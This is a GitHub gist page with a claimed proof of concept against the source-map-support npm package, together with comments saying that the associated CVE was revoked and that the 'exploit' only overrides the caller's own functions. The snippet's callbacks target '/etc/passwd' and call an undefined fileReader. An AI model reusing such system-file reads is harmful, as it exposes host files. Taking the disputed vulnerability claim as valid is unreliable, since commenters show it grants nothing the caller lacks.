-
-
Save mcoimbra/0f889d69b39c1c09aa6a8c001072402e to your computer and use it in GitHub Desktop.
Package source-map-support: Possible to inject custom file-reading functions to the package and read an arbitrary file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const path = require('path'); | |
| const pkg = require('source-map-support'); | |
| /* | |
| * Possible to use 'options' to override internal functions of the package. | |
| * For example to retrieve contents of a file that is two directories above the current one. | |
| */ | |
| const options = { | |
| overrideRetrieveSourceMap: true, | |
| retrieveSourceMap: function(src) { return fileReader('/etc/passwd') }, | |
| overrideRetrieveFile: true, | |
| retrieveFile: function(src) { return fileReader('/etc/passwd') }, | |
| } | |
| pkg.install(options); | |
| const targetPath = path.join(__dirname, '..', '..', 'exploited.txt'); | |
| const retData = pkg.retrieveSourceMap(targetPath); | |
| /* | |
| * This will output the contents of the file. | |
| */ | |
| console.log(retData); |
https://security.snyk.io/vuln/SNYK-JS-SOURCEMAPSUPPORT-6112477 currently says they've revoked this
and https://www.cve.org/CVERecord?id=CVE-2024-21540 shows they're the original CVE Numbering Authority for this CVE
I wonder how it slipped through and got a CVE number in the first place. Our SCA tool is still flagging this nonsense, hopefully that is resolved soon.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This is absolute garbage, no way this is a security vulnerability. Why would you even jump through all these hoops if you could just do
fs.read(targetPath)?